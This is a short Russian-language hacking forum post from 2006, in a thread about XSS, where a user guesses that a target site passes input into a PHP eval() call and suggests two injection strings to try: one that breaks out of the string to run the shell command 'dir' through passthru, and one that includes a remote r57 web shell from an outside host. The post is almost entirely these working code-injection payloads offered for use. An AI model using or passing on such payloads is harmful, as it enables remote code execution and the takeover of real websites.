Тема: Xss
Показать сообщение отдельно

  #5  
Старый 23.08.2006, 19:30
hidden
Постоянный
Регистрация: 23.04.2006
Сообщений: 622
Провел на форуме:
5887054

Репутация: 1292


По умолчанию

Цитата:
Сообщение от KrikSta  
:16: parser error : Unescaped '<' not allowed in attributes values
<param name='!--"<fuck>'></param>
Тут скорее всего чтото вроде

PHP код:
eval('$x="'.$y.'";'); 
попробуй

Код:
ha".passthru("dir")."ha
или

Код:
ha".include("http://rst.void.ru/download/r57shell.txt")."ha
 
Ответить с цитированием